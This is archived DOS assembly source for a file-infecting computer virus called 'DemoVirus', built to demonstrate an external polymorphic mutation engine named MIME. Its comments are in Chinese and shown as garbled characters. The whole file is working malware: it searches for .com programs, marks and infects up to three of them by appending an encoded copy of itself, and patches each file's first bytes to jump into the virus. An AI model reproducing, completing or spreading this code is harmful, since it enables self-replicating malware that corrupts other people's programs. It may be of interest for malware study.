home *** CD-ROM | disk | FTP | other *** search
- ; * The DemoVirus (for MIME v1.0) *
- ; * has written by ArChung Lai *
- ; * in Chung-Li,Taiwan *
-
- .286
- .model small
- .code
- extrn mime:near
- extrn emime:near
- start:
- jmp short begin
-
- wrt_dat db 0aeh, 0e9h
- ; ^^^^ ^^^^
- ; scasb(mark) jmp xxxx
-
- jmp_addr dw ?
-
- head_dat db 4 dup(?) ; ½Oªs│Q╖P¼V└╔«╫╢}└Y¬║ 4 bytes
- find_name db '*.com',0 ; Ñu╖P¼V com └╔
- dta_buf db 30h dup(?) ; dta ╕Ω«╞░╧
-
- begin:
- call get_adr
- get_adr:
- pop si ; ▒o¿∞░╛▓╛╢q
- sub si, offset get_adr
- mov di, si
- and di, 0fff0h ; ┼▄ª¿ 16 ¬║¡┐╝╞ (½K⌐≤¡½⌐wª∞)
- mov ax, di
- mov cl, 4
- shr ax, cl ; ┤½║Γª¿ seg
- mov cx, cs
- add ax, cx ; ▒o¿∞¡½⌐wª∞½ß¬║ cs ¡╚
- push ax
- mov ax, offset retf_to
- push ax
- mov cx, offset emime ; cx=╛π¡╙»f¼r¬°½╫ (Ñ]ºt mime ╝╥▓╒)
- cld
- rep movsb ; ╖h▓╛¿∞ÑH 16 ¼░¡┐╝╞¬║░╛▓╛ª∞º}
- retf ; ¡½⌐wª∞ (╕⌡¿∞╣∩╗⌠½ß¬║ª∞º})
- retf_to:
- push cs
- pop ds ; ds=cs
- mov si, offset head_dat ; si ½ⁿªV│Q╖P¼V¬║└╔«╫╢}└Y╕Ω«╞
- xor di, di ; di=0
- cmp byte ptr head_dat, 0 ; ªp¬G¼O╜s─╢½ß▓─ñ@ª╕░⌡ªµ½h head_dat=0
- je first ; ªp¬G¼O╜s─╢½ß▓─ñ@ª╕░⌡ªµ½h╖| jump
- mov di, 0100h ; di=100h (com └╔▒q 100h ╢}⌐l░⌡ªµ)
- push di ; save di
- movsw ; ½∞┤_¡∞└╔«╫╢}└Y
- movsw ; ½∞┤_¡∞└╔«╫╢}└Y
- pop di ; load di
- first:
- push es ; push psp-seg
- push di ; di=0 ¬╜▒╡╡▓º⌠ di=100h ░⌡ªµ¡∞└╔«╫
- push es ; ½Oªs psp ░╧¼q¡╚
- mov ah, 1ah
- mov dx, offset dta_buf
- int 21h ; │] dta ¿∞ dta_buf
- mov si, 3 ; ñ@ª╕╖P¼VñT¡╙ com └╔
- mov ah, 4eh
- mov cx, 3
- mov dx, offset find_name
- int 21h ; ╖j┤M└╔«╫ (▓─ñ@ª╕)
- jnc to_infect ; ªp¬GºΣ¿∞½h jump to_infect (╖P¼V)
- jmp short find_end ; º_½h jump find_end
- find_loop:
- mov ah, 4fh
- int 21h
- jc find_end ; ªp¬GºΣñú¿∞ com └╔½h jump find_end
- to_infect:
- call infect ; ╖P¼V
- dec si
- jnz find_loop ; ¡Y┴┘¿S╖P¼V¿∞ñT¡╙└╔«╫½h jump find_loop
- find_end:
- pop es ; ¿·ª^ psp ░╧¼q¡╚
- push es
- pop ds ; ds=es
- mov dx, 80h
- mov ah, 1ah
- int 21h ; │]ª^ dta ¿∞ 80h
- retf ; ░⌡ªµ¡∞└╔«╫ ⌐╬╡▓º⌠╡{ªí(ªp¬G▓─ñ@ª╕░⌡ªµ)
-
- infect proc
- mov dx, offset dta_buf+1eh ; dx ½ⁿªV dta ññºΣ¿∞¬║ com └╔ªW
- mov ax, 3d02h
- int 21h ; ╢}└╔ (┼¬╝gñΦªí)
- xchg bx, ax ; bx=file handle
- mov ah, 3fh
- mov cx, 4
- mov dx, offset head_dat
- int 21h ; ┼¬¿· 4 bytes ¿∞ head_dat
- inc si ; si=si+1
- cmp byte ptr head_dat, 0aeh
- je close_file ; ª╣ com └╔ñw╕g│Q╖P¼V╣L½h jump
- ; ª╣«╔ si=si+1 ⌐╥ÑH¡nª│╖P¼Vñ~ si=si-1
- dec si ; si=si-1 (ºΓ si ┤εª^¿╙)
- push si
- xor cx, cx
- xor dx, dx
- mov ax, 4202h
- int 21h ; ▓╛░╩┼¬╝g½ⁿ╝╨¿∞└╔«╫º└
- push bx ; ½Oªs bx (file handle)
- mov bx, ax ; bp=ax=ª╣ com ñº└╔«╫¬°½╫
- add bx, 100h ; bx=100 (com └╔╝╥ªí)
- sub ax, 4 ; ¡p║Γ jump ░╛▓╛ª∞º}
- mov jmp_addr, ax
- mov ax, offset emime+0fh ; ªhÑ[ñJ 0fh ÑHºK┬╨╗\¿∞»f¼r╡{ªíº└ñ┌
- mov cl, 4
- shr ax, cl
- mov cx, cs
- add ax, cx
- mov es, ax ; es=ÑH»f¼r╡{ªí½ß¡▒¼░¬┼╢í¬║░╧¼qª∞º}
- mov cx, offset emime ; cx=»f¼r¬°½╫ (Ñ]ºt mime ╝╥▓╒)
- ; ñ]┤N¼O¡n│Q╜s╜X¬║╡{ªí¬°½╫
- mov si, offset start
- mov di, 0
- call mime ; call ┼▄┼Θ╝╥▓╒
- pop bx ; ¿·ª^ file handle
- mov ah, 40h
- int 21h ; ╝gñJ ªhº╬╕╤╜X╡{ªí ⌐M │Q╜s╜X½ß¬║»f¼r
- ; ¿∞└╔º└
- push cs
- pop ds ; ds=cs (ª]¼░ ds ╖|│Qº∩┼▄)
- xor cx, cx
- xor dx, dx
- mov ax, 4200h
- int 21h ; ▓╛░╩┼¬╝g½ⁿ╝╨¿∞└╔└Y
- mov ah, 40h
- mov cx, 4
- mov dx, offset wrt_dat
- int 21h ; ╝gñJ 4 bytes ¬║ wrt_dat
- pop si
-
- close_file:
- mov ah, 3eh
- int 21h ; ├÷└╔
- ret ; ░╞╡{ªí¬≡ª^
- infect endp
-
- end start
-
